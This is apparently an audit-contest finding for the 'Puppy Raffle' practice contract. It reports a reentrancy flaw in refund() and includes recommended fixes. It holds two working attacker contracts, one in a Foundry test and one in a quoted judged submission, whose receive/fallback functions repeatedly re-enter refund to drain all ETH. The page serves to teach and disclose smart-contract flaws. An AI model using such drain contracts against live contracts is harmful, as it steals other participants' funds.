Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Reentrancy in refund + theft of all raffle funds

Description

  • refund allows an active entrant to withdraw one entranceFee and marks their slot in players as inactive.

  • The contract sends ETH before marking the entrant inactive. Because the transfer forwards all gas, an entrant implemented as a contract can re-enter refund from its receive function. Each nested call sees the same active player entry and receives another refund, allowing the attacker to drain ETH belonging to every participant.

function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
// @> External call forwards all gas while the attacker remains an active player.
payable(msg.sender).sendValue(entranceFee);
// @> State is updated only after the external call returns.
players[playerIndex] = address(0);
emit RaffleRefunded(playerAddress);
}

Risk

Likelihood:

  • Any raffle entrant can use a contract address as their participant address.

  • The attack executes whenever the raffle holds ETH from multiple entries and before selectWinner completes.

Impact:

  • The attacker repeatedly receives entranceFee until the raffle balance is drained, stealing funds paid by other participants.

  • The raffle is left unable to pay its winner or collect its expected fees.

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
import {Test} from "forge-std/Test.sol";
import {PuppyRaffle} from "../src/PuppyRaffle.sol";
contract ReentrancyAttacker {
PuppyRaffle private immutable raffle;
uint256 private immutable playerIndex;
constructor(PuppyRaffle _raffle, uint256 _playerIndex) {
raffle = _raffle;
playerIndex = _playerIndex;
}
function enterRaffle() external payable {
address[] memory entrants = new address[](1);
entrants[0] = address(this);
raffle.enterRaffle{value: msg.value}(entrants);
}
function attack() external {
raffle.refund(playerIndex);
}
receive() external payable {
// Re-enter until the entire raffle balance has been withdrawn.
if (address(raffle).balance >= raffle.entranceFee()) {
raffle.refund(playerIndex);
}
}
}
contract PuppyRaffleReentrancyTest is Test {
uint256 private constant ENTRANCE_FEE = 1 ether;
PuppyRaffle private raffle;
ReentrancyAttacker private attacker;
address private playerOne = address(0x1);
address private playerTwo = address(0x2);
address private playerThree = address(0x3);
function setUp() public {
raffle = new PuppyRaffle(ENTRANCE_FEE, address(0x99), 1 days);
attacker = new ReentrancyAttacker(raffle, 0);
vm.deal(address(attacker), ENTRANCE_FEE);
vm.deal(playerOne, ENTRANCE_FEE);
vm.deal(playerTwo, ENTRANCE_FEE);
vm.deal(playerThree, ENTRANCE_FEE);
// Attacker occupies players[0].
attacker.enterRaffle{value: ENTRANCE_FEE}();
address[] memory entrants = new address[](1);
entrants[0] = playerOne;
vm.prank(playerOne);
raffle.enterRaffle{value: ENTRANCE_FEE}(entrants);
entrants[0] = playerTwo;
vm.prank(playerTwo);
raffle.enterRaffle{value: ENTRANCE_FEE}(entrants);
entrants[0] = playerThree;
vm.prank(playerThree);
raffle.enterRaffle{value: ENTRANCE_FEE}(entrants);
}
function test_ReentrantRefundDrainsRaffle() public {
assertEq(address(raffle).balance, 4 ether);
attacker.attack();
assertEq(address(raffle).balance, 0);
assertEq(address(attacker).balance, 4 ether);
}
}

Recommended Mitigation

Apply checks-effects-interactions and add reentrancy protection. Clear the entry before sending ETH:

function refund(uint256 playerIndex) external nonReentrant {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
players[playerIndex] = address(0);
emit RaffleRefunded(playerAddress);
(bool success,) = payable(msg.sender).call{value: entranceFee}("");
require(success, "PuppyRaffle: Refund transfer failed");
}

Import and inherit OpenZeppelin’s ReentrancyGuard; the state update is the essential fix, while nonReentrant provides defense in depth.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 5 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!